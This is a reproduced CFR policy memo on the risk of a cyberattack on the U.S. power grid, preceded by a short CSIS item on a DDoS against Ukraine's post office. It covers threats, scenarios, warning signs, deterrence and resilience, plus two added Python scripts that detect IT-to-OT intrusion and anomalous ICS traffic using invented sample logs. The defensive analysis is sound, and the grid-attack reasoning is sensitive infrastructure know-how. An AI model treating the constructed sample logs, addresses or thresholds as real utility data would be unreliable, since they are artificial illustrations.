April 2022. Hackers targeted Ukraine’s National Post Office with a DDoS attack, days after it released a new stamp honoring a Ukrainian border guard. The attack affected the agency’s ability to run its online store.

Source: Csis.org

A Cyberattack on the U.S. Power Grid

The U.S. power grid has long been considered a logical target for a major cyberattack. A cyberattack that successfully disrupts grid operations would be extremely difficult but not impossible. An attack on the power grid could be part of a coordinated military action, intended as a signaling mechanism during a crisis, or as a punitive measure in some other arena. The United States should take measures to prevent a cyberattack on its power grid and mitigate the potential harm should preventive efforts fail, writes Robert K. Knake, Whitney Shepardson Senior Fellow at the Council on Foreign Relations, in a contingency planning memorandum of the same title.

Introduction

The U.S. power grid has long been considered a logical target for a major cyberattack. Besides the intrinsic importance of the power grid to a functioning U.S. society, all sixteen sectors of the U.S. economy deemed to make up the nation’s critical infrastructure rely on electricity. Disabling or otherwise interfering with the power grid in a significant way could thus seriously harm the United States.

Robert K. Knake, Whitney Shepardson Senior Fellow

Carrying out a cyberattack that successfully disrupts grid operations would be extremely difficult but not impossible. Such an attack would require months of planning, significant resources, and a team with a broad range of expertise. Although cyberattacks by terrorist and criminal organizations cannot be ruled out, the capabilities necessary to mount a major operation against the U.S. power grid make potential state adversaries the principal threat.

Attacks on power grids are no longer a theoretical concern. In 2015, an attacker took down parts of a power grid in Ukraine. Although attribution was not definitive, geopolitical circumstances and forensic evidence suggest Russian involvement. A year later, Russian hackers targeted a transmission-level substation, blacking out part of Kiev. In 2014, Admiral Michael Rogers, director of the National Security Agency, testified before the U.S. Congress that China and a few other countries likely had the capability to shut down the U.S. power grid. Iran, as an emergent cyber actor, could acquire such capability. Rapid digitization combined with low levels of investment in cybersecurity and a weak regulatory regime suggest that the U.S. power system is as vulnerable—if not more vulnerable—to a cyberattack as systems in other parts of the world.

An adversary with the capability to exploit vulnerabilities within the U.S. power grid might be motivated to carry out such an attack under a variety of circumstances. An attack on the power grid could be part of a coordinated military action, intended as a signaling mechanism during a crisis, or as a punitive measure in response to U.S. actions in some other arena. In each case, the United States should consider not only the potential damage and disruption caused by a cyberattack but also its broader effects on U.S. actions at the time it occurs. With respect to the former, a cyberattack could cause power losses in large portions of the United States that could last days in most places and up to several weeks in others. The economic costs would be substantial. As for the latter concern, the U.S. response or non-response could harm U.S. interests. Thus, the United States should take measures to prevent a cyberattack on its power grid and mitigate the potential harm should preventive efforts fail.

The Contingency

The U.S. power system has evolved into a highly complex enterprise: 3,300 utilities that work together to deliver power through 200,000 miles of high-voltage transmission lines; 55,000 substations; and 5.5 million miles of distribution lines that bring power to millions of homes and businesses. Any of the system’s principal elements––power generation, transmission, or distribution––could be targeted for a cyberattack. In the Ukraine case, attackers targeted substations that lower transmission voltages for distribution to consumers. Lloyd’s of London, an insurance underwriter, developed a plausible scenario for an attack on the Eastern Interconnection—one of the two major electrical grids in the continental United States—which services roughly half the country. The hypothetical attack targeted power generators to cause a blackout covering fifteen states and the District of Columbia, leaving ninety-three million people without power. Other experts have concluded that an attack on the system for transmitting power from generation to end consumers would have devastating consequences. In one scenario, disruption of just nine transformers could cause widespread outages. Many experts are now also concerned that smart grid technologies, which use the internet to connect to power meters and appliances, could allow an attacker to take over thousands—if not millions—of unprotected devices, preventing power from being delivered to end users.

Regardless of which part of the power grid is targeted, attackers would need to conduct extensive research, gain initial access to utility business networks (likely through spearphishing), work to move through the business networks to gain access to control systems, and then identify targeted systems and develop the capability to disable them. Such sophisticated actions would require extensive planning by an organization able to recruit and coordinate a team that has a broad set of capabilities and is willing to devote many months, if not years, to the effort. State actors, therefore, are the more likely perpetrators, and given these long lead times, U.S. adversaries have likely already begun this process in anticipation of conflict. It is doubtful that a terrorist organization would have both the intent and means to carry out such an attack successfully. In the future, however, criminal groups could pose a real threat. They are growing in sophistication and in some cases rival, if not exceed, the capabilities of nation states. Payments for ransomware—malicious software that encrypts data and will not provide a code to unlock it unless a ransom has been paid—by some estimates have topped $300 million. This funding could allow criminal groups to purchase more sophisticated capabilities to carry out the ultimate ransomware attack.

The likelihood that an attack carried out by a determined and capable adversary would be thwarted by security measures is low. While some U.S. utilities might block attempts by an adversary to gain initial access or might be able to detect an adversary in their systems, many might not have the necessary tools in place to detect and respond. Efforts to improve data sharing that could enable detection by one company to block access across the entire industry are in their infancy. In the Lloyd’s scenario, only 10 percent of targeted generators needed to be taken down to cause a widespread blackout.

Short of outright conflict with a state adversary, several plausible scenarios in which the U.S. power grid would be subject to cyberattack need to be considered:

Discrediting Operations. Given the importance of electricity to the daily lives of Americans, an adversary may see advantage in disrupting service to undermine public support for a U.S. administration at a politically sensitive time.

Distracting Operations. A state contemplating a diplomatic or military initiative likely to be opposed by the United States could carry out a cyberattack against the U.S. power grid that would distract the attention of the U.S. government and disrupt or delay its response.

Retaliatory Operations. In response to U.S. actions considered threatening by another state, such as the imposition of economic sanctions and various forms of political warfare, a cyberattack on the power grid could be carried out to punish the United States or intimidate it from taking further action with the implied threat of further damage.

There are many plausible circumstances in which states that possess the capability to conduct cyberattacks on the U.S. power grid––principally Russia and China, and potentially Iran and North Korea––could contemplate such action for the reasons elaborated above. However, considerable potential exists to miscalculate both the impact of a cyberattack on the U.S. grid and how the U.S. government might respond. Attacks could easily inflict much greater damage than intended, in good part because the many health and safety systems that depend on electricity could fail as well, resulting in widespread injuries and fatalities. Given the fragility of many industrial control systems, even reconnaissance activity risks accidentally causing harm. An adversary could also underestimate the ability of the United States to attribute the source of a cyberattack, with important implications for what happens thereafter. Thus, an adversary’s expectations that it could attack the power grid anonymously and with impunity could be unfounded.

Warning Indicators

A series of warning indicators would likely foretell a cyberattack on the U.S. power grid. Potential indicators could include smaller test-run attacks outside the United States on systems that are used in the United States; intelligence collection that indicates an adversary is conducting reconnaissance or is in the planning stages; deterioration in relations leading to escalatory steps such as increased intelligence operations, hostile rhetoric, and recurring threats; and increased probing of electric sector networks and/or the implementation of malware that is detected by more sophisticated utilities.
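Two of the signs above, an adversary working from the utility business network toward control systems and increased probing of electric-sector networks, are observable at the IT/OT boundary. The script below is an added example, not code from the CFR memorandum or from any utility: it models the check a utility SOC could run over firewall or Zeek conn.log-style records. The subnet layout, the allow-listed jump host, the record format and the sample records are constructed assumptions; the ICS protocol port numbers are the standard assignments.

```python
"""Flag IT-to-OT boundary crossings and ICS port probing in connection records.

Added example. Network layout, allow-list, log format and sample data are
constructed for illustration and do not come from the memorandum.
"""
import ipaddress
from collections import defaultdict

# Hypothetical layout: corporate LAN versus control-system LAN.
IT_SUBNETS = [ipaddress.ip_network("10.10.0.0/16")]
OT_SUBNETS = [ipaddress.ip_network("192.168.100.0/24")]
# Hypothetical allow-list: the one jump host permitted to reach OT.
ALLOWED_IT_SOURCES = {"10.10.5.10"}

# Standard ICS/SCADA protocol ports (real assignments).
ICS_PORTS = {
    502: "Modbus/TCP",
    20000: "DNP3",
    2404: "IEC 60870-5-104",
    102: "ISO-TSAP (IEC 61850 MMS / S7comm)",
    44818: "EtherNet/IP",
}

# Constructed sample records: "ts src_ip src_port dst_ip dst_port proto".
# One legitimate jump-host session, one workstation sweeping OT hosts on
# five ICS ports, one IT-only flow, and one SSH attempt into OT.
SAMPLE_LOG = """\
1700000001 10.10.5.10 51000 192.168.100.20 502 tcp
1700000002 10.10.42.7 51001 192.168.100.20 502 tcp
1700000003 10.10.42.7 51002 192.168.100.21 502 tcp
1700000004 10.10.42.7 51003 192.168.100.22 20000 tcp
1700000005 10.10.42.7 51004 192.168.100.23 2404 tcp
1700000006 10.10.42.7 51005 192.168.100.24 102 tcp
1700000007 10.10.42.7 51006 192.168.100.25 44818 tcp
1700000008 10.10.8.3 51007 10.10.9.9 443 tcp
1700000009 10.10.8.3 51008 192.168.100.30 22 tcp
"""


def in_any(ip, nets):
    """True if the address falls inside any of the given networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def parse_line(line):
    """Split one whitespace-separated record into a dict."""
    ts, src, _sport, dst, dport, proto = line.split()
    return {"ts": int(ts), "src": src, "dst": dst, "dport": int(dport), "proto": proto}


def find_crossings(log_text):
    """Return every IT->OT connection whose source is not on the allow-list."""
    crossings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if (in_any(rec["src"], IT_SUBNETS) and in_any(rec["dst"], OT_SUBNETS)
                and rec["src"] not in ALLOWED_IT_SOURCES):
            rec["service"] = ICS_PORTS.get(rec["dport"], "non-ICS")
            crossings.append(rec)
    return crossings


def find_probing(crossings, min_targets=3):
    """Flag sources that reached >= min_targets distinct OT hosts or ICS ports.

    A single stray connection is a policy violation; a source fanning out
    across many OT hosts or protocols is the reconnaissance the memo warns of.
    """
    by_src = defaultdict(lambda: {"hosts": set(), "ics_ports": set()})
    for rec in crossings:
        by_src[rec["src"]]["hosts"].add(rec["dst"])
        if rec["dport"] in ICS_PORTS:
            by_src[rec["src"]]["ics_ports"].add(rec["dport"])
    return {
        src: {"hosts": len(v["hosts"]), "ics_ports": sorted(v["ics_ports"])}
        for src, v in by_src.items()
        if len(v["hosts"]) >= min_targets or len(v["ics_ports"]) >= min_targets
    }


def main():
    crossings = find_crossings(SAMPLE_LOG)
    for c in crossings:
        print(f"IT->OT crossing: {c['src']} -> {c['dst']}:{c['dport']} ({c['service']})")
    for src, summary in find_probing(crossings).items():
        print(f"PROBING: {src} reached {summary['hosts']} OT hosts "
              f"on ICS ports {summary['ics_ports']}")


if __name__ == "__main__":
    main()
```

On the constructed records the allow-listed jump host is ignored, the IT-only flow is ignored, the single SSH attempt from 10.10.8.3 is reported as a crossing but not as probing, and 10.10.42.7 is flagged for sweeping six OT hosts across five ICS protocols. In production the subnet lists would come from the asset inventory and the threshold would be tuned against a baseline of legitimate engineering traffic.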

Implications for U.S. Interests

A large-scale cyberattack on the U.S. power grid could inflict considerable damage. The 2003 Northeast Blackout left fifty million people without power for four days and caused economic losses between $4 billion and $10 billion. The Lloyd’s scenario estimates economic costs of $243 billion and a small rise in death rates as health and safety systems fail. While darker scenarios envision scarcity of water and food, deterioration of sanitation, and a breakdown in security, leading to a societal collapse, it would be possible to mitigate the worst effects of the outage and have power restored to most areas within days. At this level of damage, the American public would likely demand a forceful response, which could reshape U.S. geopolitical interests for decades. Traditional military action, as opposed to a response in kind, would be likely.

In addition to the direct consequences of a cyberattack, how the United States responds also has implications for its management of the situation that may have prompted the attack in the first place, the state of relations with the apparent perpetrator, the perceived vulnerability of the United States, and the evolution of international norms on cyberwarfare.

How the U.S. government reacts, more than the actual harm done, will determine whether the cyberattack has a continuing impact on geopolitics. If the incident reveals a U.S. vulnerability in cyberspace that can be targeted to deter the United States from taking action abroad, the implications of the incident would be profound. If, on the other hand, the U.S. government shows firm resolve in the face of the attack and does not change its behavior in the interest of the attacker, the event is unlikely to have significant consequences for the role of the United States abroad.

On the domestic front, a highly disruptive attack would likely upend the model of private sector responsibility for cybersecurity. As was done with aviation security after 9/11, Congress would likely move quickly to take over responsibility for protecting the grid from cyberattack by either creating a new agency or granting new authorities to an existing agency such as U.S. Cyber Command. Such a move would likely reduce the efficiency of grid operations and open the door to expanding government’s role in protecting other sectors of the economy. A devastating attack might also prompt calls to create a national firewall, like China and other countries have, to inspect all traffic at national borders. However, the experience of other countries and the technical reality of the internet suggest that these firewalls are ineffective for cybersecurity but well suited to restricting speech online and censoring information.

Preventive Options

Preventing an attack will require improving the security of the power grid as well as creating a deterrence posture that would dissuade adversaries from attacking it. The goal of such a strategy should be to secure the power grid to make it defensible, to detect attempts to compromise the security of the grid, and to provide certainty to adversaries that the United States will be able to attribute the attack and respond accordingly.

Protective Measures. Unlike enterprise information technology, the industrial control systems that control the power grid typically perform single functions and need to communicate only with a small set of other devices in routine patterns. Thus, securing these systems and detecting malicious activity should, in theory, be relatively simple. In practice, many industrial control systems are built on general computing systems from a generation ago. They were not designed with security in mind and cannot be updated. This problem has not been corrected with the latest generation of smart grid technologies; the Government Accountability Office (GAO) has found that these devices often lack the ability to authenticate administrators and cannot maintain the activity logs necessary for forensic analysis, among other deficiencies. These devices are often accessible from the public internet and use weak authentication mechanisms. Thus, improving the protection of the grid requires investing in new, more secure technology that can be protected and implementing basic cybersecurity hygiene. The challenge, therefore, is not developing technical specifications to secure the grid but incentivizing investment.
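To illustrate the report's point that control-system devices talk to a small, fixed set of peers in routine patterns, here is an added example (written for this page, not code from the CFR report or from any utility) that builds an allowlist of observed flows and flags anything outside it, including reachability from the public internet. All addresses, ports and flow records are constructed.

```python
"""Allowlist-style anomaly detection for ICS network flows (added example).

In an OT network the set of (source, destination, port) triples seen over a
learning window is small and stable, so that set can act as the baseline
and every flow outside it deserves an analyst's attention.
Every address, port and record below is constructed for illustration.
"""
from ipaddress import ip_address, ip_network

# Address space the constructed plant network is expected to use; anything
# outside it is treated as external (the report notes devices are often
# reachable from the public internet, which should never be routine).
OT_RANGES = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]

# Constructed learning-window flows: an HMI (10.10.1.5) polling two PLCs over
# Modbus/TCP (port 502) and a historian (10.10.3.20) pulling from the HMI.
BASELINE_FLOWS = [
    ("10.10.1.5", "10.10.2.10", 502),
    ("10.10.1.5", "10.10.2.11", 502),
    ("10.10.3.20", "10.10.1.5", 1433),
] * 3  # repeated polling cycles, as a real capture would show

# Constructed detection-window flows containing four deviations.
OBSERVED_FLOWS = [
    ("10.10.1.5", "10.10.2.10", 502),     # routine poll, in baseline
    ("203.0.113.7", "10.10.2.10", 502),   # PLC reached from outside OT ranges
    ("10.10.1.5", "10.10.2.10", 23),      # known pair, non-routine port
    ("10.10.9.99", "10.10.2.11", 502),    # host never seen during learning
    ("10.10.3.20", "10.10.2.10", 502),    # historian talking straight to a PLC
]


def build_baseline(flows):
    """Distinct (src, dst, port) triples seen during the learning window."""
    return set(flows)


def is_external(ip):
    """True when the address falls outside the expected OT address space."""
    addr = ip_address(ip)
    return not any(addr in net for net in OT_RANGES)


def detect_anomalies(baseline, flows):
    """Return (flow, reason) pairs for every flow absent from the baseline.

    Reasons are ordered from most to least alarming so the first matching
    explanation is the one reported; baseline flows produce nothing.
    """
    known_hosts = {ip for src, dst, _ in baseline for ip in (src, dst)}
    known_pairs = {(src, dst) for src, dst, _ in baseline}
    findings = []
    for flow in flows:
        src, dst, _port = flow
        if flow in baseline:
            continue
        if is_external(src):
            reason = "control-system access from outside OT address space"
        elif src not in known_hosts:
            reason = "new source host on OT network"
        elif (src, dst) in known_pairs:
            reason = "known pair, unexpected port"
        else:
            reason = "known host, new peer"
        findings.append((flow, reason))
    return findings


if __name__ == "__main__":
    for flow, reason in detect_anomalies(build_baseline(BASELINE_FLOWS), OBSERVED_FLOWS):
        print(f"{flow}: {reason}")
```

Because the baseline is a learned allowlist, it must be built from a window known to be clean and rebuilt after legitimate engineering changes, or the new routine will itself be reported.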

A regulatory approach could theoretically set a minimum standard, thereby leveling costs across all companies and addressing cost-cutting in security measures. Such a regimen—the Critical Infrastructure Protection Standards established by the North America Electric Reliability Council (NERC)—has been in place for over a decade, though GAO has found that many standards remain voluntary and the extent to which utilities have implemented these standards is unknown. Raising and enforcing standards could help prevent a catastrophic attack by encouraging utilities to proactively defend their networks. A model for such an approach could be borrowed from the nuclear sector, where the Nuclear Regulatory Council has established so-called Design Basis Threats and requires nuclear plant operators to prove that they have the controls in place to defeat such threats. Yet, given the thin margins on which utilities operate, such an unfunded mandate is not likely to meaningfully improve security. Moreover, current federal requirements do not extend to power distribution, which is regulated unevenly at the state level.

As regulated entities with fees set by control boards, utilities do not have sufficient budgets to significantly increase security funding. Risk managers at utilities will argue that they must balance the possibility of a cyberattack against the near certainty that weather events will affect their customers. A decision to increase spending on cybersecurity could come at the expense of burying power lines, raising them above the tree line, or trimming trees along the lines. In 2016, the Department of Energy (DOE) received only three reports of cyber incidents at utilities; none of the incidents affected customers. In the same time period, forty-one weather events caused outages, affecting 5.2 million customers. Numbers for 2015 show a similar pattern. Thus, some form of rate relief is needed to encourage significant investments in cybersecurity.

More could also be done to improve government support for securing electric utilities. The DOE has run a pilot program, known as the Cybersecurity Risk Information Sharing Program (CRISP), for several years to help companies detect advanced threats targeting their networks. DOE labs have also funded research projects on the specific cybersecurity needs of utilities. Yet critics of the program argue that it is too expensive for most utilities to participate in and that it is only focused on detecting threats at network boundaries rather than within ICS networks. Expansion of intelligence and data sharing between the government and private companies, and among private companies themselves, could greatly reduce the chances of an attacker being capable of taking down multiple targets and causing a cascading effect. The Electricity Information Sharing and Analysis Center (E-ISAC) is mostly focused on physical threats and weather events. GAO found cybersecurity information sharing weak across the sector. Sectors such as finance and the defense industrial base have developed strong information sharing practices with government support. Emulating these efforts in the electricity sector would be a valuable government contribution to help owners and operators in the industry protect themselves.

Given the large number of utilities and the vast infrastructure to protect, even with improved cybersecurity, an adversary would still be likely to find numerous unprotected systems that can be disrupted. As the Lloyd’s analysis concluded, only 10 percent of targeted generators needed to be taken offline to cause widespread harm. Therefore, improving the security of individual utilities alone is unlikely to significantly deter attackers. By focusing on detecting early signs of an attack and sharing that information within the sector and with the government, even when individual utilities fail to detect attacks on themselves, they can warn the government and other companies and help prevent wider disruption.

Deterrent Measures. Adversaries may underestimate both the ability of the U.S. government to determine who carried out an attack and the seriousness with which such an attack would be addressed. Law enforcement agencies such as the Federal Bureau of Investigation (FBI) and the U.S. Secret Service have built strong forensic investigation capabilities and strong relationships with both foreign law enforcement and the intelligence community. Through cooperation, the U.S. government has been able to determine the parties behind most major attacks. The Barack Obama administration publicly named the foreign actors behind some attacks and provided supporting evidence on a case-by-case basis. Making public attribution of attacks a routine practice could be a deterrent.

Beyond simply naming the adversary behind attacks, the U.S. government could make clear how it would view an attack on the power grid and the kinds of responses it would consider. Characterizing an attack on the power grid as an armed attack would likely have the strongest deterrent effect. Doing so would reflect the developing norms against peacetime attacks on critical infrastructure as agreed to in the UN Group of Governmental Experts. In keeping with these norms, the U.S. government could outline response options that would be proportional but not necessarily in kind. These response options would clarify how the U.S. government would respond not only to a successful attack but also to a failed attempt and to the discovery of adversarial probing and exploration to prepare for an attack.

In developing its policy, the U.S. government should keep in mind that a strong policy against targeting U.S. systems could constrain U.S. military options to target foreign systems. Yet, given the long lead times for carrying out a successful cyberattack campaign, labeling reconnaissance activities as hostile actions and limiting such activities by U.S. cyber operators could mean forgoing the ability to make significant use of cyber operations during a conflict.

Mitigating Options

If an attack on the grid cannot be prevented, steps can be taken now to mitigate the effects of the attack and plan the response.

Pre-Attack Measures. Actions taken now could significantly mitigate the effects of a large-scale blackout caused by a cyberattack. Maintaining and exercising manual operations of the grid, planning and exercising recovery operations, and continually expanding distributed power could significantly shorten the duration of any blackout and reduce economic and societal damage.

A SANS Institute report concluded that the effects of the attack on Ukraine’s power grid were largely mitigated because grid operations there could be returned to manual control. Most experts believe that the current complexity of grid operations in the United States would make a switch to manual operations difficult; newer systems might not allow for the use of manual controls at all. Requiring the ability to shift to manual controls and exercising those controls on an annual basis might now be the most valuable step to take. Michael Assante, the former chief information security officer for NERC, argues that utilities should design their systems with backup tools that are either not connected to any information technology networks or are analog. For certain pieces of technology, it may make sense to replace software systems with hardware systems, “hardwiring” functions into circuit boards so that they cannot be modified remotely.

The next administrator of the Federal Emergency Management Agency (FEMA) could make response and recovery planning a priority. The all-hazards approach favored in emergency management may prove insufficient for a blackout of long duration covering large swaths of the nation. Beyond domestic emergency planning, exercising crisis response at a national level with government, allies, and private sector actors would be valuable. Doing so would identify the difficulties of operating without power systems and prompt the development of response options to prevent unneeded delay.

The continued expansion of distributed generation in the form of wind and solar installations could also significantly reduce the magnitude of an attack on the grid; however, most rooftop systems feed directly into the grid, and homes and businesses do not draw from their own systems. From a resiliency perspective, it might be worth incentivizing the purchase of systems that allow a direct draw and have on-site storage. Moving military installations in the continental United States off the grid so that they can supply their own power would eliminate one of the rationales for attacking the grid and limit the hindrance caused by such an attack on military operations.

Post-Attack Measures. Following an attack, eliminating malware and regaining control of the power grid would likely be carried out by the owners and the operators of affected systems with support from private incident response teams. Specialized support from the Department of Homeland Security’s Industrial Control System Computer Emergency Response Team (ICS-CERT) and the DOE national labs would also be provided.

The government’s main role would be attributing the attack and responding to it. The FBI would take lead responsibility for investigating the attack domestically and for conducting computer forensics. The intelligence community would look at its existing intelligence collection for indications of what might have been missed and would begin targeted collection efforts to trace the attack. Within weeks, the U.S. government would have confidence in its attribution.

The White House would set the public posture for the response. Based on precedents from both cyber- and non-cyberattacks over multiple administrations, government agencies would likely advocate for a show of firm resolve but recommend avoiding a rush to judgment or an immediate counterattack. Agencies would present a range of options to respond. These options would include a show of military force, such as moving U.S. ships into disputed waters or staging exercises in contested regions; response in kind, through cyberspace; traditional military options; public and private diplomacy; use of economic sanctions targeting the state and the private entities or individuals involved; use of international law enforcement to arrest any parties involved; and targeting of known intelligence assets. The president should choose a strategy that combines these options in such a way as to deter the adversary from escalating further—the adversary should recognize that the consequences of continued escalation will be severe and choose to cease hostile activity, allowing a reset of the relationship.

Recommendations

The Donald J. Trump administration should focus its efforts on preventing an attack on the grid both through a deterrence policy and by strengthening security. The deterrence policy should articulate how the administration would view an attack on the power grid and should outline possible response options. As a starting point, the administration should be clear that an action against the grid would be treated as an armed attack and signal that a military response in or out of cyberspace would likely be required. The policy should also address how the administration would view the discovery that an adversary had taken initial steps toward a takedown of the grid, particularly the discovery that foreign actors had infiltrated utility networks. Together with continually demonstrating law enforcement and intelligence capabilities to attribute the sources of cyberattacks, a strong statement on deterrence could do more than anything else to prevent an attack on the grid. To ensure that the United States will be able to maintain military operations even in the face of a large blackout, the Trump administration should plan to end the reliance of military installations on the grid. Doing so would also reduce the likelihood of the grid becoming a military target.

To protect the grid from cyberattack, the Trump administration should initially focus on creating an information-sharing system that can bring together early signals that an attack against the grid is under way and share information that can be used to stop it. A stronger E-ISAC and a strong DOE counterpart to support it are necessary. The DOE should model its efforts on the Department of Defense’s Cyber Crime Center, which provides intelligence feeds and forensic support to companies within the defense industrial base. The newly created Cyber Threat Intelligence Integration Center within the Office of the Director of National Intelligence should ensure that collection and analysis of threats to the grid are an intelligence priority and that intelligence on threats to the grid is downgraded and shared with targeted utilities.

In the event that an attack on the grid succeeds in causing a blackout, however limited, the Trump administration should ensure that both the government and the industry are prepared to respond. FEMA should develop a response plan for a prolonged regional blackout that addresses the logistical difficulties of responding at scale in an environment degraded by the loss of power. NERC standards should require companies to maintain capabilities for manual operations. Those operations need to be exercised on a regional and coordinated basis.

Finally, the Trump administration should ensure that utilities can invest sufficiently in cybersecurity and do not need to make tradeoffs between traditional risk management activities and addressing national security threats. Increased funding could be achieved through a user fee similar to the universal service fee on phone lines, though a new tax on consumers may not be politically feasible. Alternatively, a tax deduction for utility spending on cybersecurity may be a less direct—but more politically palatable—way to increase funding. The Trump administration should also set security requirements for infrastructure investments made for the grid as part of its proposed stimulus package.

Collectively, these recommendations, if implemented, would greatly reduce the likelihood of an adversary deciding to conduct a cyberattack on the U.S. power grid while also improving the chances that the United States would manage any such attack without significant disruption of service.

Source: Cfr.org
